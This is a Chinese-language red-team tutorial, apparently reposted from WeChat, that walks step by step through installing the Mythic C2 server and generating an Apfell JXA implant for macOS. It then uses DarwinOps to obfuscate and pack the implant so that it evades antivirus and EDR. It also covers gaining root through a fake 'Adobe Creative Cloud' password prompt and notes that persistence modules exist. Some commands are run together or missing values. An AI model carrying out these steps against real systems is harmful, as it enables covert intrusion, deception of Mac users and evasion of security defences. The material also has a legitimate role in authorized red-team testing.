使用DarwinOps设置和武装Mythic C2以针对MacOS

我们将了解如何在 MacOS 上设置 Mythic C2 及其 Apfell 载荷。我们将该植入物武器化，以使用 BallisKit DarwinOps 绕过 EDR。我们还将展示如何使用权限提升模块来获得 root 访问权限。

1. 验证依赖关系

在开始之前，请确保您拥有构建所需的所有依赖项：mythic-cli

apt install make -yapt install git -y

2. 从 GitHub 下载 Mythic

从 GitHub 克隆 Mythic 存储库并导航到其中：

sudo git clone https://github.com/its-a-feature/Mythic.gitcd Mythic

3. 安装 Docker 和 Docker Compose

Mythic 需要 Docker 和 Docker Compose 来运行其服务。使用以下脚本之一安装 Docker：

• Debian 的：

./install_docker_debian.sh

• 卡利 Linux：

./install_docker_kali.sh

• 乌班图：

./install_docker_ubuntu.sh

4. 构建 Mythic-CLI

构建 ：mythic-cli

make

如果一切顺利，您应该有一个文件可供使用。./mythic-cli

5. 启动 Mythic

现在脚本已执行，Mythic 已准备好启动：

./mythic-cli start

提示：某些容器可能需要一些时间来初始化并与其他服务通信。最初看到错误消息是很常见的;重要的是所有容器都已启动，如下所示：

6. 配置

所有配置都通过文件或使用命令完成：.env

./mythic-cli config

如果需要远程访问 C2 服务器，则必须执行以下命令：

./mythic-cli config set mythic_server_bind_localhost_only false && ./mythic-cli restart

您现在可以从服务器的 IP 地址访问 UI 面板。如果无法连接，请确保将 'BOUND LOCALLY' 设置为 false。

通过以下方式访问 Mythic UI：

https://127.0.0.1:7443/new/login

您应该会看到如下所示的登录面板：

用户名：密码：密码是自动生成的，可以在文件中找到。或者，使用命令：mythic_admin.env

grep ^MYTHIC_ADMIN_PASSWORD= .env | cut -d = -f2

7. 安装 Payload 和 C2Profile

登录后，转到 Payloads 部分：

当前未安装任何内容。让我们安装我们的 payload 和 communication channel。

• 安装 Apfell
  
  ：这是使用 JXA 的 macOS 的 Mythic 负载：

sudo ./mythic-cli install github https://github.com/MythicAgents/apfell

• 安装 HTTP C2Profile
  
  ：要与我们的植入程序通信，请安装 HTTP C2Profile：

sudo ./mythic-cli install github https://github.com/MythicC2Profiles/http

您现在应该看到：

8. 生成 Apfell Payload

要生成 Apfell 有效负载：

• 选择 MacOS
  
  （如果 Apfell 是唯一安装的负载，则应为默认值）。
• 选择 Apfell
  
   （如果它是唯一安装的负载，则也是默认的）。
• 添加任何所需的命令（这些命令不会影响整个过程）。

选择 C2 配置文件时，请确保包含 HTTP：

验证参数是否匹配。默认情况下，它设置为 和 port 。如果这些不一致，它将不起作用：https://80

输入参数后，您可以下载有效负载：

9. 使用 DarwinOps

现在，您已生成有效负载，防病毒程序可能会标记并删除它。所以我们需要将其武器化。为此，我们将依靠 DarwinOps，这是 MacOS 的 Redteam 工具包！

1. 使用以下命令行将 Apfell 负载武器化：

./darwin_ops -G payload.app -i apfell.js --autopack --obfuscate

2. 执行生成的有效负载：

./in_memory_exec.js

如果您需要更多权限，可以使用 Privesc 模块将自己伪装成一个合理的应用程序。

./darwin_ops -G privesc.app -i apfell.js--privesc--privesc-delay-execution10--privesc-prompt_app_name "Adobe Creative Cloud" --privesc-prompt-app-icon CreativeCloudApp.icns--autopack--obfuscate

如您所见，我们可以通过植入程序获得 root 访问权限，并且 DarwinOps 还允许您通过其他模块添加持久性。

原文始发于微信公众号（安全狗的自我修养）：使用DarwinOps设置和武装Mythic C2以针对MacOS